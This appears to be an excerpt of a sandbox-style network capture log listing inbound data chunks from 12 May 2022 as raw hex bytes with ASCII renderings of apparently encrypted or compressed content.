                                                                                                                                  2022-05-12 17:41:27 UTC90INData Raw: e6 5f 32 78 6e 68 72 27 68 01 59 d3 83 d7 71 61 d4 86 e7 f3 91 0c dc 1a a4 34 d5 7f d3 ab d5 57 07 41 2d 0e 25 0b e8 b2 30 27 85 ce 21 d3 b2 0d 77 a8 f7 66 72 13 65 f4 5e ed f1 eb 84 6b e0 7b 32 81 af d4 1e 0b 1a 3f 90 f2 63 c6 17 65 b0 f3 d7 5c c6 76 d0 40 b5 27 1d df eb b0 a0 ed 1b 22 9b 25 47 73 65 3a 26 fd 66 02 12 53 12 be e0 02 c1 e0 29 a4 da 32 28 91 e7 7f 05 50 75 b9 06 69 90 fe a1 97 20 13 0b f2 1d b0 cb d2 3a db 05 30 85 5c dc ad 43 f9 06 4c 32 18 a1 a8 88 90 a6 c0 00 f2 ba 12 06 0a da cd ad d5 33 f2 01 d5 4e 2b 4b 42 b3 2c 68 cc a0 86 e5 d9 bb ee b6 14 c0 35 04 3e 8c b3 93 28 45 82 34 41 1e ac 37 78 8d e8 1a ee 0d 0b b1 59 bd 95 e4 68 3e e2 1d 20 33 07 b0 6e 9f 25 47 23 9b 32 01 70 fb 8f be a1 d4 e1 79 e9 16 25 45 b4 7f 5c fd b1 4b 46 ca 52 62
                                                                                                                                  Data Ascii: _2xnhr'hYqa4WA-%0'!wfre^k{2?ce\v@'"%Gse:&fS)2(Pui :0\CL23N+KB,h5>(E4A7xYh> 3n%G#2py%E\KFRb
                                                                                                                                  2022-05-12 17:41:27 UTC92INData Raw: 82 b2 c7 31 2e a9 67 32 1e c4 40 1b 94 44 60 36 3c 90 55 3a d3 30 7c 6d 5e 92 c7 35 f7 19 20 78 46 f0 c1 ba 4a 7a 32 e9 7c f8 43 95 ec a4 8a 3b 52 20 3e b3 cf 46 ca 6a 8b 01 22 74 14 41 1a 17 29 c1 e9 9e 5d 60 54 ed 81 e6 4b 26 85 ab a5 2d b0 48 63 e2 70 29 1b cb 81 8a c5 d8 ee 83 79 69 c6 51 07 86 02 52 52 8e 73 2b 71 28 37 12 38 53 93 a8 b9 18 26 12 a8 a4 04 29 bc 55 38 9c 6e 68 b3 fa 78 cc 4c fd 8c a2 8c dd ce 14 fe 72 93 b4 18 48 0f 6f 4f 64 a6 66 92 ea 28 72 1a 1c 24 56 4b 22 77 92 7a 15 24 1f 0d d4 7f 38 e1 2b be e1 2b 66 d5 3d 71 cb b0 f1 ea be 34 9a e6 d8 d5 72 df 8c fb ae bf 0a 22 e2 7f f1 df b8 fc c3 5f 36 b6 58 7f 3c 52 f2 55 d5 76 f9 b8 f0 f3 1f 0a 3f db 9e ce 15 5a a9 ca fe 3c c2 19 92 fc 3d ca 04 e9 f8 b7 4c 7b 40 1b 85 5f 91 b6 a7 ab a2 00
                                                                                                                                  Data Ascii: 1.g2@D`6<U:0|m^5 xFJz2|C;R >Fj"tA)]`TK&-Hcp)yiQRRs+q(78S&)U8nhxLrHoOdf(r$VK"wz$8++f=q4r"_6X<RUv?Z<=L{@_
                                                                                                                                  2022-05-12 17:41:27 UTC93INData Raw: 47 46 5d af 63 fe cd a0 80 68 c1 a5 f9 b5 1c bf 31 04 38 06 2f 9b 37 5d a3 fb 55 0a 84 33 69 82 fd 2b 56 69 97 aa 39 9d 8e c4 c8 2f eb 15 ad 26 67 d5 77 80 64 a0 4e 96 2d 17 3f 69 8e be a7 59 f9 5e 0c 0a 3a 19 47 53 52 e2 a9 56 cb d2 32 ba 36 19 30 d5 dd fd bd 4b 11 cb f8 55 66 c3 fc b7 d1 8e 8d d0 be 8a 4f cc 06 fc 25 83 ca 58 3c b2 a0 20 73 68 d2 4a 88 51 91 09 99 50 b4 50 65 02 d3 a3 37 0d a0 27 ac 27 3d a6 44 4d 91 43 b5 37 76 89 b2 b6 9c 4c d7 b7 70 eb 1d 69 9a 26 fe 2d 7f 92 75 0e 85 8c bb f1 64 89 f7 2a f7 5e 77 43 81 25 58 4f 83 34 5f a7 db 76 9f 69 fd 13 6a 0c 3a b0 73 87 84 51 a8 d8 f3 b1 a9 79 88 c4 52 30 0b 6b 27 f1 5e 16 6f 6c 27 46 a6 7f 93 a8 29 75 67 78 f4 c2 12 32 55 f0 b5 8c 62 c2 46 48 05 be a3 f2 95 d4 63 e5 b3 fd 93 eb 47 6e c7 af 52
                                                                                                                                  Data Ascii: GF]ch18/7]U3i+Vi9/&gwdN-?iY^:GSRV260KUfO%X< shJQPPe7''=DMC7vLpi&-ud*^wC%XO4_vij:sQyR0k'^ol'F)ugx2UbFHcGnR
                                                                                                                                  2022-05-12 17:41:27 UTC94INData Raw: e1 2d 6e dc 15 d9 81 b1 f7 85 ec 35 9a e0 c3 c4 7a b1 58 ca ac b5 58 2d c7 57 0c df b8 e7 c6 59 26 e6 58 7f 36 8c fb 5d 26 60 03 a3 8e f7 10 1b 3b 5f 33 fc 3d ac 4e cb f9 3a d6 06 8e d5 f9 ca 04 e3 d0 7b 48 ca 4d 32 a9 42 91 bc ad a9 9f 02 8b 24 18 f3 ec 39 06 6e e3 eb df dd d4 29 38 73 ac e1 87 59 b5 bd 0e e3 6e 32 80 13 55 7e c3 5a fd da 97 81 11 a2 de 30 fa d6 14 15 af 40 f5 14 34 7e b5 42 e5 d7 29 eb 36 87 64 02 be 45 dc e8 38 2e 43 6e 62 6b 0c 7c 0e 67 f5 d6 98 78 49 e7 8e f6 fd d2 75 d7 09 aa 5e aa 55 ea a1 ba 69 3c f5 27 1d 22 0b eb b7 99 1b 67 c8 09 f0 a4 80 52 bb f2 76 64 3e d3 f3 56 f6 dd bf fe 69 ea 48 dc fd ad d4 05 61 04 9a 90 f8 41 ff 58 65 ba ea c2 4b e8 f6 d1 9d 05 54 0e dd fa bc dc f2 0b 29 80 f3 30 4a 67 3b 04 86 8a 02 18 6a 15 c0 f2 28
                                                                                                                                  Data Ascii: -n5zXX-WY&X6]&`;_3=N:{HM2B$9n)8sYn2U~Z0@4~B)6dE8.Cnbk|gxIu^Ui<'"gRvd>ViHaAXeKT)0Jg;j(
                                                                                                                                  2022-05-12 17:41:27 UTC96INData Raw: df a2 29 47 44 7b b6 5f b6 cd f9 83 5e c1 1c 4a f8 3a a1 7e 01 6b 5f 9b d9 fd dd 23 40 33 df 5c 29 e5 ec 25 f3 41 08 42 98 3a b8 a7 cf c0 ae 21 fd 78 0b 23 c2 01 38 57 f8 7d 89 43 48 7a 44 12 9c 82 f6 93 df e9 da bf e5 88 33 8f 08 c7 af 49 19 fa e2 b8 f1 53 50 38 69 8a f9 98 14 fd b4 2c 13 f7 57 ce d3 ef e0 61 6b 58 80 ac 64 fd d5 72 50 f8 d0 5e 4e 36 e4 2a 91 c2 a1 99 a6 b0 57 bd a0 52 d0 2c 96 61 ee 18 0e 0d 21 d1 9a a2 c4 1c a5 ca 37 17 64 79 10 e6 d6 65 00 82 64 e2 e4 2f 9e 62 8b c4 3d 7a 6a 7b f6 c8 cb f0 26 25 1a 79 d9 f8 bc 59 7a 0f 07 4b 78 54 98 ea da c4 25 44 d8 2e 95 d2 51 28 4f 8a 01 25 76 19 4f 04 6b 1b c0 f8 95 53 72 bb e4 c2 aa 5b 21 94 85 86 25 df 89 c0 fd 63 e4 19 ee b8 aa da fb 1a 91 58 4e f9 59 16 85 52 e5 7c ef 65 fd 62 32 02 04 24 5c
                                                                                                                                  Data Ascii: )GD{_^J:~k_#@3\)%AB:!x#8W}CHzD3ISP8i,WakXdrP^N6*WR,a!7dyed/b=zj{&%yYzKxT%D.Q(O%vOkSr[!%cXNYR|eb2$\
                                                                                                                                  2022-05-12 17:41:27 UTC97INData Raw: 00 5e 3e 0e 28 1a fe 95 2a 11 99 cf 0d c2 a2 a8 df aa f7 6d ed fe 74 f3 57 ef f0 9b f1 7a ea 71 58 f7 b2 c8 ea 65 00 1c 81 ff 5f ff ae 61 ba e6 c7 c0 c7 5b d5 9c 17 33 09 f7 62 b6 cf f3 32 33 91 f5 55 60 60 24 13 fa 6c 02 09 6a 1b 51 e7 06 72 e8 46 ba f3 8c 23 b9 59 68 00 7d 13 87 02 1d 96 f3 bb 9f 39 16 0b fd 2a 13 34 d3 10 cf 19 32 88 6b 64 be 49 f3 3f a7 2d 0a 55 84 c1 f2 9b e9 88 f6 a9 11 9b 52 d2 dc a8 a9 4c ef 12 cc 3f 56 58 48 a6 5a d5 cc 8c 89 cc 9c a8 e6 a2 23 5e 22 0e 38 8b 34 8b 3e bb 82 0c 4e 0c 54 46 78 8d e3 1a 5d 0d 0b b1 1e 97 95 e4 64 07 fa 15 31 3d 7b cf 73 88 3c 36 5f 88 38 17 e1 bb a2 fd b6 c1 c0 b2 13 17 2f 06 d6 42 5d fd ab 4c 57 c3 3c 5a d6 f9 3e 49 cc f2 c0 ab fe b9 94 55 66 c2 72 47 3f 7e 46 0e d9 75 fa cd 9a ed 4b 6b 2a a8 c1 5c
                                                                                                                                  Data Ascii: ^>(*mtWzqXe_a[3b23U``$ljQrF#Yh}9*42kdI?-URL?VXHZ#^"84>NTFx]d1={s<6_8/B]LW<Z>IUfrG?~FuKk*\
                                                                                                                                  2022-05-12 17:41:27 UTC98INData Raw: b1 3b 27 e6 5c e2 d6 e8 aa 69 ee a5 e3 c1 ad 87 39 6c db 30 fc 25 36 15 be 55 cd 32 1f 7e b3 6b 23 d1 38 e7 2d b9 02 12 b8 54 d9 70 21 00 62 78 fe 70 26 60 10 e8 e0 fb 89 67 fd cf 88 ed e1 62 67 d8 06 b8 d3 bf 7b ce b7 26 72 03 5f 31 81 33 1c f0 96 23 83 76 c8 3e d9 b2 1c 49 ae e8 6c 77 8a 65 f5 49 f0 e3 18 ef 6f ff 7c 5f 61 bc d2 0b 6a 3a a1 81 fe 54 d8 01 f9 ab e6 da 3e 1b 5a d5 97 0e 2e 0a b0 22 b7 cf f3 13 35 fe 22 5e 73 6f 32 0d ee 09 8f 1a 60 08 a3 ce 7b 66 e0 23 a6 e6 a4 ca 93 e1 6a 19 f6 7b a8 00 1c 8f f9 b0 8b 25 14 b8 e6 32 1a dc 5e 6d c8 0d 20 2f 65 7c b5 41 7d 99 21 63 18 ab 84 4f f2 9a d2 08 e5 a1 0f 03 1a 5f 8e a9 ba 48 e3 08 ce 3c 40 5e de a8 4a 3c db 3c 91 fd c8 bc 7a b3 35 6c a9 04 38 90 2f 9d 3e d5 af 01 44 02 92 35 50 9c e2 32 43 dd 07
                                                                                                                                  Data Ascii: ;'\i9l0%6U2~k#8-Tp!bxp&`gbg{&r_13#v>IlweIo|_aj:T>Z."5"^so2`{f#j{%2^m /e|A}!cO_H<@^J<<z5l8/>D5P2C
                                                                                                                                  2022-05-12 17:41:27 UTC99INData Raw: d3 e5 d3 ae ce a7 7f b9 77 f0 cc 7f 41 e3 cb bf 46 e4 e6 11 9b d9 a6 9f b3 b5 69 97 a1 7e d8 2f 25 5d c5 e0 d9 d1 27 be ce 00 db 1c 9c d4 07 05 69 46 33 18 d7 96 0a 93 7d e3 21 3b ae 81 a8 d7 30 7a 6a 71 f5 39 34 dd 0c 21 18 7b ec d2 bb 59 61 24 fc 5f 96 46 b9 fc da cd 12 92 22 2f bf f6 b0 a4 57 8c 6e 6e 65 1e 5a 39 67 1a d3 ee 98 5d 6d 5c 1b ef 8b 41 20 81 85 10 26 df 89 69 f8 69 f0 14 ff ae ba 3b d9 c8 96 62 52 ed 4f 14 8b dc 43 44 90 9a fc 4e 27 21 3f 6b 5e ad 8a 4b fb ca cb b9 90 2b 1b b6 ab 33 a3 75 7f ba fa 96 c8 4c f1 3d b6 88 f7 cd 07 79 33 a7 b4 07 43 1c 68 4f 01 a1 79 9b ae 29 5e 11 23 23 47 4e b7 64 96 65 02 37 18 0c c5 78 20 1f 1f 92 f9 03 c1 d0 3d 77 ad 9f f0 ea a5 1c 25 e2 c5 d3 5a fd 9f cb a6 b5 9f 31 e5 7f 30 d8 a2 13 d4 7e 1d cf 4c 81 3d
                                                                                                                                  Data Ascii: wAFi~/%]'iF3}!;0zjq94!{Ya$_F"/WnneZ9g]m\A &ii;bROCDN'!?k^K+3uL=y3ChOy)^##GNde7x =w%Z10~L=
                                                                                                                                  2022-05-12 17:41:27 UTC100INData Raw: 33 10 30 f7 35 4c d6 d2 3c c8 0d 21 8d 74 7b ad 43 89 2f ad 32 62 aa 85 ed f1 9d c1 00 e9 a9 1b 16 18 e2 db a9 bc 48 f0 01 3c 35 56 58 40 b3 41 3d a2 51 81 f4 da b5 b9 91 34 46 26 6b 31 9b 3e 9e 22 43 ab 87 55 0a 8e 87 96 8c e2 38 44 7e df ba 36 88 87 e2 7f 29 ff 3d cf 35 68 cc 7b 12 28 3c 5f 98 21 03 0e b2 98 c0 9e c4 e8 55 b1 06 2d 57 cf 6a af fc b7 47 46 c5 29 8d d6 04 63 4f db 7f b6 54 01 47 c4 5d 77 ca f9 af 4c 40 9b f0 27 28 5e c4 8e f9 02 66 d4 57 aa b2 a9 2c 44 00 4d 5b 81 5f 3c c0 99 50 b5 df 7c 1c c1 aa 3e ab b0 28 b3 9a 6f 32 41 56 a5 ae f8 ab 6d 97 a9 bd f3 d1 c5 b8 68 dc 69 6e 9a 26 63 2f 78 9c 74 38 7b 00 79 f1 f8 99 5a 24 f5 55 6d f7 62 2b 47 4e b2 b0 4b 8f d9 e9 8e 60 f4 92 4d f8 3a b1 67 0f 81 76 2f d5 ec d0 41 ab 87 db 5d 3c 42 e6 33 f7
                                                                                                                                  Data Ascii: 305L<!t{C/2bH<5VX@A=Q4F&k1>"CU8D~6)=5h{(<_!U-WjGF)cOTG]wL@'(^fW,DM[_<P|>(o2AVmhin&c/xt8{yZ$Umb+GNK`M:gv/A]<B3
                                                                                                                                  2022-05-12 17:41:27 UTC101INData Raw: d0 e6 55 bf a6 e1 5b 2f f9 2c 8a 94 98 48 0f 6f d3 01 a1 79 bc 70 d7 72 1a 32 b9 47 4c 32 58 84 e6 19 23 00 3c f4 ff 38 e1 1e 22 f0 2c 60 e5 2b ed 94 b6 ee d8 8f cb 9a e6 c5 49 63 d9 80 f8 ba 23 97 25 fd 4b 01 5f b8 ed d5 ce 1f cf 47 4a 1c d2 fb 4c 2b eb c4 b7 9c d0 3d 8a 35 d1 84 5f 04 54 ae 03 e9 8c c7 01 91 ec f6 9f 98 f2 d7 3e 71 64 28 af b7 58 8e 86 b3 d3 33 11 8c 11 22 ec 8e 70 17 69 ed a4 d5 b3 48 32 35 44 38 fa e2 c3 8c 3e 13 dd 7b 3a b6 06 52 67 d4 90 89 46 8c 8a 26 64 c5 5f 60 ef 31 0a ee 55 fd 23 21 79 ac 28 2f a5 b5 f0 3c b0 dd 1c db df de eb 2f 42 65 1d fe 70 27 66 43 6b 9e 61 82 76 7e 98 91 9a 6b ef 71 c1 5d b1 39 32 6c d4 be f2 7c 60 dd 36 1a 3d 53 f0 bf a9 0e 60 d1 6b cc ec 1c 49 af e8 2c 7e 42 e8 e2 51 e3 b9 9b aa f5 f1 76 56 b0 b2 84 88
                                                                                                                                  Data Ascii: U[/,Hoypr2GL2X#<8",`+Ic#%K_GJL+=5_T>qd(X3"piH25D8>{:RgF&d_`1U#!y(/</Bep'fCkav~kq]92l|`6=S`kI,~BQvV
                                                                                                                                  2022-05-12 17:41:27 UTC103INData Raw: bb 3c bb 29 72 36 41 51 81 55 77 1c 6f 08 18 99 1f d9 48 0f 79 11 f3 bf 17 77 62 3c 71 9e 79 39 65 02 0c e6 22 8b ea 26 f0 6a 61 ce 95 3b 4a 53 79 bf 4e aa 4f e2 9f 6b f5 c5 de 99 a4 a1 7e 0c 43 4d ba c4 e1 cb 27 59 65 ca 59 a1 f0 e0 ec e9 97 94 1e 87 27 47 b5 e5 94 b6 3f fe d7 13 f9 d0 01 27 48 df 39 89 42 fb 65 dc 14 b0 a1 fa 07 03 5d e4 ab ec 9f 27 a9 7f c2 be 4d 2f cb 11 a1 d9 61 84 29 6b 39 e6 00 d4 72 99 9e 13 fd 6e 8d c2 ea fb 00 a4 49 84 b7 75 77 1c e1 56 f8 db 50 49 5c cd 72 8a d3 ac a6 ef a8 7f 63 88 71 da 04 2a 6f ff 10 31 f8 32 df 81 0e ca 05 87 6f e9 09 4c 4e 1f 18 d7 43 19 9c 44 db 32 3c 9c a3 a8 d1 1a 7a 3a 6a e9 c7 35 f1 0a 28 0d 7d f1 c1 ac 5b 70 23 f5 56 68 47 9a ea cb c9 27 52 26 2e aa ee 49 a5 0a 8a 01 24 8f 1e 50 02 67 1d 4d c6 98 4c
                                                                                                                                  Data Ascii: <)r6AQUwoHywb<qy9e"&ja;JSyNOk~CM'YeY'G?'H9Be]'M/a)k9rnIuwVPI\rcq*o12oLNCD2<z:j5(}[p#VhG'R&.I$PgML
                                                                                                                                  2022-05-12 17:41:27 UTC104INData Raw: 21 d3 3e 37 28 ab 8f 07 af 46 fe 2d ee 14 52 43 62 61 2a 51 fc 75 f1 fb 9e 59 4f de 8e fc 29 f2 5e e8 1b ae 45 a6 12 1b a0 ba 69 2f 48 0d 1d 22 1a ee 8f 35 1f 67 ce 11 d3 e9 fd 58 ba ea 67 61 17 67 c3 50 fc da 86 fe 69 0f 71 49 ec bb c7 1c 5c 39 3f 90 f8 4b c6 1f 7c 44 e1 fd 44 d1 5c c3 82 14 bb 07 cc f2 b6 de f1 05 35 6f f4 73 60 63 39 18 eb e8 b5 09 65 14 c0 72 28 66 ea 0f b1 ea 9f 21 91 f0 64 1f 77 82 a9 2c 0f 9e 70 16 9b e9 01 cc 7a 1a 0d ca d3 2f cd 12 2c 9e 7c 7b bc 4b ec 27 53 33 34 a1 94 ea ff 82 99 9c eb a3 08 1f 03 c3 d4 b6 aa b7 f1 2d d5 24 50 5e 94 aa 45 34 dc b3 88 f4 c1 a2 f9 af c2 45 1d 08 26 17 11 94 28 44 90 24 4a 04 97 a7 78 9c ea 2f b7 0c 27 b2 27 85 8e fb 4d b3 f5 06 39 37 79 c2 7b 61 2e 10 5c 81 21 03 1f ab 86 a0 59 c4 c4 5b 02 10 3e
                                                                                                                                  Data Ascii: !>7(F-RCba*QuYO)^Ei/H"5gXgagPiqI\9?K|DD\5os`c9er(f!dw,pz/,|{K'S34-$P^E4E&(D$Jx/''M97y{a.\!Y[>
                                                                                                                                  2022-05-12 17:41:27 UTC105INData Raw: 22 4e ec 35 a5 29 0b d1 90 13 eb 15 b6 fc 33 06 69 8c 32 18 c6 69 9a 93 6c f5 bf 13 96 7d a9 dd 36 6c 64 6b 75 c1 22 d1 a6 28 0b 7d 6d c7 a4 79 d8 23 e3 54 f4 41 8c ca 33 c9 3a 52 ba 29 a3 fe 99 a5 57 8a 9d 22 7e 3e e8 13 78 16 5c ef 84 53 22 d9 e3 f3 b8 74 ba 85 b3 ab 6f 43 89 7d eb 65 8a 88 e8 b6 ad da e6 78 96 6b 4a f7 5b 9b 8a c3 5e 5c e9 f8 fb 7d 20 3b 8b 2f 43 a3 a0 9b e7 d9 cc 25 87 33 0b a3 73 ae 89 7f 7e 9e 34 56 cc 4c 6b 54 bf 9b e8 a0 a2 f8 2c b5 94 99 48 0f 6f d3 16 b9 75 8b cc 2e 6d 0e 12 c2 56 4b 2d eb 94 65 1d 04 ad 0c d4 7f a4 e7 01 a8 fe 38 e3 d2 22 66 a5 14 f1 ea af a8 9c f9 dd f5 c2 de 9f cb 30 b9 99 3b fd 06 bd d9 a7 f7 f5 bc 0e c8 58 e3 3a 4d e0 53 64 eb d3 af 9f f9 12 96 33 ce 99 dc 54 cf b7 2b e1 0f c3 9a 88 cb f6 ea e9 e3 d0 21 d4
                                                                                                                                  Data Ascii: "N5)3i2il}6ldku"(}my#TA3:R)W"~>x\S"toC}exkJ[^\} ;/C%3s~4VLkT,Hou.mVK-e8"f0;X:MSd3T+!
                                                                                                                                  2022-05-12 17:41:27 UTC106INData Raw: 1c 03 c3 d7 b1 44 48 dc 0b dd 1d 19 49 42 b3 4f 32 de ab 80 e5 db b5 e8 5c 3d 68 21 15 3f b2 f3 90 28 43 ec 63 54 0a 82 b0 77 9e e9 32 58 06 14 b4 c8 83 b8 e8 67 3e ec 7a f6 36 68 c0 73 8f 3c 37 5f 88 39 12 e1 bb a2 b7 d4 d0 ea 51 19 1a 3f 50 d0 42 4c f6 a8 47 a9 c2 11 ac 11 6a 9c b6 33 ed ba 47 0a 46 c6 5e 79 d2 11 b9 ec 8b 8a f8 31 5c 5c c4 85 fc 39 9f d5 46 ab bc a6 c6 6d 2c 44 4c 80 5b bb d4 91 4f be df 7f 0d d8 b7 5b 6f b0 04 a5 30 56 fd 51 42 8b 74 c0 aa 67 8c b8 33 c8 d5 da ab 65 cb f5 62 84 d8 63 10 4a 9f 75 3f 6a a4 7c f0 f8 9e e9 3c 89 66 79 df 8b 20 53 6c f2 b4 5f a1 cd 67 89 66 e2 1e 5e ec 2e 98 eb 1b 95 54 a0 59 bd da 35 69 af 23 5c 2f 4d df d5 fe 41 13 44 98 2e 55 ad e3 93 ac 25 7b 9e 0a 0f dc 03 33 40 e5 63 02 6f 23 6f 48 03 9c 7a f0 93 df
                                                                                                                                  Data Ascii: DHIBO2\=h!?(CcTw2Xg>z6hs<7_9Q?PBLGj3GF^y1\\9Fm,DL[O[o0VQBtg3ebcJu?j|<fy Sl_gf^.TY5i#\/MAD.U%{3@co#oHz
                                                                                                                                  2022-05-12 17:41:27 UTC108INData Raw: 7e 1e 4b af 0d d4 75 57 44 1c be eb 0d 6e d0 2c 75 93 de 41 eb af 3e f5 43 c7 d5 78 f8 8e cf bd bb 90 4d 52 7e 21 d5 d7 48 d7 52 04 ee 49 7b 14 9b fa 4c 2d 7b c4 b4 90 e3 0c 0f 24 d4 92 ac a5 52 b1 3e 90 b5 d4 06 84 f2 f8 cf 15 e6 c6 4e f8 7a 46 39 c9 fa 93 bc a6 94 be 04 a3 c7 18 f3 ea f4 de 7d f8 8e db d5 c3 f9 21 4f 16 e8 ac 49 8c 3d 1d e7 72 75 9a 16 55 72 84 2a ff da 97 ab 28 29 cd e6 ef f3 27 18 be 5e ec 5b 18 84 b2 6a 36 c4 2f f4 33 b8 44 10 ab 50 c0 c7 78 17 7e 46 ab 60 20 7f 2e 00 f3 fd 99 62 77 cc 98 de 94 ff 76 d4 09 a0 5e aa 6c d7 b7 d5 d3 04 41 2d 72 87 18 ef 95 13 0e 63 df 25 c5 cb 30 59 a8 fd 08 c4 14 74 f9 70 ed f3 95 f0 41 c3 71 49 f7 be d2 05 6b 3b eb 83 f7 5a d8 06 70 8b 52 d3 49 e8 78 d5 9d 09 34 14 ce fc a7 c6 e3 75 84 93 f5 55 60 6d
                                                                                                                                  Data Ascii: ~KuWDn,uA>CxMR~!HRI{L-{$R>NzF9}!OI=ruUr*()'^[j6/3DPx~F` .bwv^lA-rc%0YtpAqIk;ZpRIx4uU`m
                                                                                                                                  2022-05-12 17:41:27 UTC109INData Raw: ba 8c bb fb 85 d2 f9 35 f9 5e 54 cc 9f 2a 56 4b bc 8a a1 a6 f7 cb 8c 1d a2 1e 4a fc 49 1a 71 1b 9f 47 dd a6 42 d8 35 62 af 77 5e 2f 4d e1 76 34 42 19 4f 98 1a 55 a9 e3 93 a8 25 61 9e 0a 0f fa 10 32 ca 53 6b 98 46 fb 63 4e 89 13 b0 f4 92 f1 b3 cb b3 f7 b1 c5 a7 6e cd b8 cf ea eb ee a0 f1 92 52 38 65 00 0b 94 0e e6 dd 45 03 fb 79 0f 82 ef ea 0f 23 5e 9f b4 68 ec c6 6e 5f f6 e7 bf 46 e4 92 04 f3 92 a7 8e bd a2 6e 6d 76 dd 81 04 20 67 c6 d8 27 2e 2b d3 eb 3e da 16 b2 c1 44 ac 6b 66 38 09 d2 3a a4 91 6c ff 1a 93 94 7d a2 de 26 ec 08 d8 eb c7 3f d9 a5 2a 0b 77 f8 d6 2a 2a de 21 e3 5e 40 e8 97 ea c1 c0 22 c4 55 81 bb de 40 8d f8 88 01 2e 6c 07 c6 60 d6 14 c0 e3 b0 e3 68 45 ef c6 17 48 26 89 a4 ae b1 68 e0 b4 e2 7a fd 69 a0 a8 a7 c1 c7 df 83 7b 41 f9 5e 18 95 22
                                                                                                                                  Data Ascii: 5^T*VKJIqGB5bw^/Mv4BOU%a2SkFcNnR8eEy#^hn_Fnmv g'.+>Dkf8:l}&?*w**!^@"U@.l`hEH&hzi{A^"
                                                                                                                                  2022-05-12 17:41:27 UTC110INData Raw: 76 d4 32 1e 4d ae 77 c9 ce 74 62 05 47 54 b7 20 1a e5 e1 9e 1d 67 c4 09 62 a6 80 52 aa 8c 58 60 16 70 80 e4 fe f5 8e d6 da e2 71 43 d5 19 d6 14 6e 43 f2 91 f8 4d c8 5a 76 b5 e0 c0 42 df 55 2b 9c 2f 2f 1b dc 2d bc d0 f6 09 2d 91 e4 50 6c 20 c5 0f c5 52 00 1b 13 a8 ad e6 20 79 ec 43 dd 5c 8e 29 9b c9 c3 02 7b 76 b9 0c 05 44 8d 13 8e 33 1c 32 58 37 0d c0 fa 8c ca 0d 2b 95 1b b5 ac 43 f5 a9 be 38 07 ed 96 e2 e3 8c ce 1f ee 57 1a 3b 1b d0 cd a1 92 aa f0 01 d5 5a 9d 48 42 bf cf 7a cd a0 81 e7 d6 b5 fd b1 33 44 20 0b 27 b0 c0 95 04 4c bb 0c 54 0a 84 b0 53 9e ed 32 58 02 10 45 37 ae 9a e6 15 6e ea 15 35 0e f1 31 93 60 33 2f 50 99 23 04 00 b1 70 bf 8b c3 c3 14 0c 1b 36 4c db 53 52 e2 f3 b3 56 ef 34 9d a8 fa 9c b6 d3 b7 a2 5b 01 57 d8 4a 20 3c ee 94 dd 82 e8 5a 24
                                                                                                                                  Data Ascii: v2MwtbGT gbRX`pqCnCMZvBU+//--Pl R yC\){vD32X7+C8W;ZHBz3D 'LTS2XE7n51`3/P#p6LSRV4[WJ <Z$
                                                                                                                                  2022-05-12 17:41:27 UTC112INData Raw: 18 4c 7b 76 e3 7e aa ee 15 3b 04 7d e0 ce ab a7 71 0f e0 4c 7b 48 95 fb c4 d6 1b ac 27 03 bf f5 78 ba 75 99 0e 24 74 11 4f 08 86 17 ec f5 91 5d 63 47 f4 e6 8f a9 26 83 a7 a5 21 f7 6c 62 e2 70 98 d8 ef a9 a1 5a c7 f8 83 7b 41 f9 5e 18 af 22 53 6f 81 75 f4 75 fb 35 1e 36 78 be 8f 46 f6 d6 d3 8d 7f 2d 28 ec 57 49 ce 61 6e ba da 47 c8 9a 78 09 a0 8a f5 ef 93 fc 33 ad b6 63 76 0e 6f 4b 16 d5 cc 90 50 22 63 1f 41 8b 54 4b 27 5f 3d 78 08 2e 16 1a 42 0c 96 e3 1e b4 c9 84 7d d4 37 59 35 b3 f1 e0 a6 23 0c 51 aa 03 72 de 95 b6 e7 be 86 26 fd 4a 32 d0 b8 fc da 4d 39 36 59 53 4b 50 80 0d 2a 77 d1 b8 92 e2 cb 85 6e d1 84 c1 3d 65 b0 34 f5 12 ad 38 8f d4 ed cc 77 49 d2 21 42 6a 43 40 08 5d 91 b6 84 1d ad 00 81 07 0f 65 9f 42 04 6e f8 b0 65 dd d4 29 3b 4c 93 96 29 5d 9d
                                                                                                                                  Data Ascii: L{v~;}qL{H'xu$tO]cG&!lbpZ{A^"Souu56xF-(WIanGx3cvoKP"cATK'_=x.B}7Y5#Qr&J2M96YSKP*wn=e48wI!BjC@]eBne);L)]
                                                                                                                                  2022-05-12 17:41:27 UTC113INData Raw: 83 a4 14 83 20 54 22 77 af 78 87 ca ab 49 0d 01 a8 3d 93 93 f3 e2 7e eb 15 30 1f 9b ca 6c 95 3c 3b 4e 92 23 03 20 cd 70 41 58 c7 93 12 12 17 21 4a ca 44 8b 72 ed 4d 57 c1 2c a0 a7 b1 74 93 db 24 3c 4c 01 46 d6 28 2e c3 ef bc d6 92 9f e6 37 8f c1 7b 8d 37 39 86 c6 5a 98 c1 ad 38 6c 11 4b 4a 8a c7 e8 c7 99 52 cf 8a 75 0d cd a3 49 fb 8f f5 b6 38 7e 38 44 47 9c 51 76 f2 67 86 ad d2 9d d1 c6 bc 01 06 e5 69 9c 1c 0b 3d 70 8d 7e 55 2c 8d bb f5 8b 32 fa 35 f7 3f d2 dd 90 20 6f e8 a1 b6 55 b1 e8 b4 8c 1d a1 1e 4a fc 33 a1 75 cd 1a 04 b7 d5 ee a1 7d 69 87 df 4d 22 6f c1 37 fe 4b 1b 34 b9 26 46 a2 e4 f1 0d 38 70 6a 1a 2b b0 bc 36 46 fe 43 37 45 ea 61 59 01 c7 02 f6 93 d3 63 64 b1 fd 93 1e 17 6c c7 a5 52 be fa e3 2e 80 61 52 3a 14 6d e9 94 0a 5b dd 58 02 fb 75 21 eb
                                                                                                                                  Data Ascii: T"wxI=~0l<;N# pAX!JDrMW,t$<LF(.7{79Z8lKJRuI8~8DGQvgi=p~U,25? oUJ3u}iM"o7K4&F8pj+6FC7EaYcdlR.aR:m[Xu!
